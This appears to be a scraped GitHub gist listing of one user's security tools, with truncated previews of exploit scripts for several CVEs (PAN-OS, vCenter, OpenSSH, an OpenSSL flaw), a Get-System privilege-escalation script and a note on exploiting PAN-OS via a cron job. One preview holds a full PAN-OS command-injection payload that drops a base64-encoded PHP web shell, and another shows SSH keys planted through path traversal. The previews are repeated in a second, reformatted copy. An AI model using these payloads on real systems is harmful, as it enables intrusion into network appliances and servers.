Keith Lee milo2012

## sendKeys.go
package main
import (
	//"flag"
	"log"
	"fmt"
	"strings"
	"time"
	"github.com/stephen-fox/user32util"
)
var timeout time.Duration = 1

## CVE-2020-25780.py
import optparse
import requests
import xml.etree.ElementTree as ET
import xmltodict
import base64

def fixed_xml_body_as_string(filename):
	text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
	text+='   <soapenv:Header/>'
	text+='	   <soapenv:Body>'

## CVE-2017-15944_1.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
requests.packages.urllib3.disable_warnings()
session = requests.Session()
def step3_exp():
	exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
	return exp_post

## CVE-2017-15944_2.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
import time
requests.packages.urllib3.disable_warnings()
session = requests.Session()
path = "/opt/var.cp/cores"
def step3_exp(command):

## CVE-2017-15944.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                milo2012
                / CVE-2017-15944.md
            
            
              Last active
              June 22, 2023 08:07
            
              
                CVE-2017-15944.md
              
          
    Description

I encountered a situation where the target running PAN-OS was vulnerable to CVE-2017-15944 but I was unable to exploit it using Metasploit.
The issue with exploiting CVE-2017-15944

One of the techniques of exploiting CVE-2017-15944 exploit, is to create a file under /opt/pancfg/mgmt/logdb/traffic/1/* which gets processed by the cron job (/etc/cron.d/indexgen -> /usr/local/bin/genindex_batch.sh). Metasploit uses this technique.
The article at https://tinyhack.com/2019/01/10/alternative-way-to-exploit-cve-2017-15944-on-pan-os-6-1-0/ mentions that it might be impossible to exploit CVE-2017-15944 as the script is already running. The article mentions that the cron job
(/etc/cron.d/core_compress -> /usr/local/bin/core_compress) is also vulnerable to command injection.

  
## searchKaliPkg.py
import sys
import requests
import optparse
from bs4 import BeautifulSoup
import multiprocessing
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()

def getHTML(url):

## Get-System.ps1
function Get-System {
<#
.SYNOPSIS

GetSystem functionality inspired by Meterpreter's getsystem.

Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: PSReflect

## CVE-2010-4180.py
'''
#https://www.tenable.com/plugins/nessus/51892

% python3 CVE-2010-4180.py -t x.x.x.x
[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
    Session-ID-ctx:

## CVE-2021-21972.py
import requests, optparse, concurrent.futures, sys, functools, itertools, tarfile, os, shutil
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt  -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS
Login using 'ssh -i id_rsa vsphere-ui@x.x.x.x'
'''

## CVE-2018-15473.py
# Exploit: OpenSSH 7.7 - Username Enumeration
# Author: Justin Gardner
# Date: 2018-08-20
# Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz
# Affected Versions: OpenSSH version < 7.7
# CVE: CVE-2018-15473

###########################################################################
#                ____                    _____ _____ _    _               #
#               / __ \                  / ____/ ____| |  | |              #
	package main
	import (
	//"flag"
	"log"
	"fmt"
	"strings"
	"time"
	"github.com/stephen-fox/user32util"
	)
	var timeout time.Duration = 1
	import optparse
	import requests
	import xml.etree.ElementTree as ET
	import xmltodict
	import base64

	def fixed_xml_body_as_string(filename):
	text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
	text+=' <soapenv:Header/>'
	text+=' <soapenv:Body>'
	#!/usr/bin/env python
	# encoding: utf-8
	import requests
	import sys
	import base64
	requests.packages.urllib3.disable_warnings()
	session = requests.Session()
	def step3_exp():
	exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
	return exp_post
	function Get-System {
	<#
	.SYNOPSIS

	GetSystem functionality inspired by Meterpreter's getsystem.

	Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
	License: BSD 3-Clause
	Required Dependencies: PSReflect
	'''
	#https://www.tenable.com/plugins/nessus/51892

	% python3 CVE-2010-4180.py -t x.x.x.x
	[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
	SSL-Session:
	Protocol : TLSv1.2
	Cipher : ECDHE-RSA-AES256-GCM-SHA384
	Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
	Session-ID-ctx:
	import requests, optparse, concurrent.futures, sys, functools, itertools, tarfile, os, shutil
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
	requests.packages.urllib3.disable_warnings()
	'''
	% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -e
	[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
	[+] https://172.16.164.1 SUCCESS
	Login using 'ssh -i id_rsa vsphere-ui@x.x.x.x'
	'''
	# Exploit: OpenSSH 7.7 - Username Enumeration
	# Author: Justin Gardner
	# Date: 2018-08-20
	# Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz
	# Affected Versions: OpenSSH version < 7.7
	# CVE: CVE-2018-15473

	###########################################################################
	# ____ _____ _____ _ _ #
	# / __ \ / ____/ ____\| \| \| \| #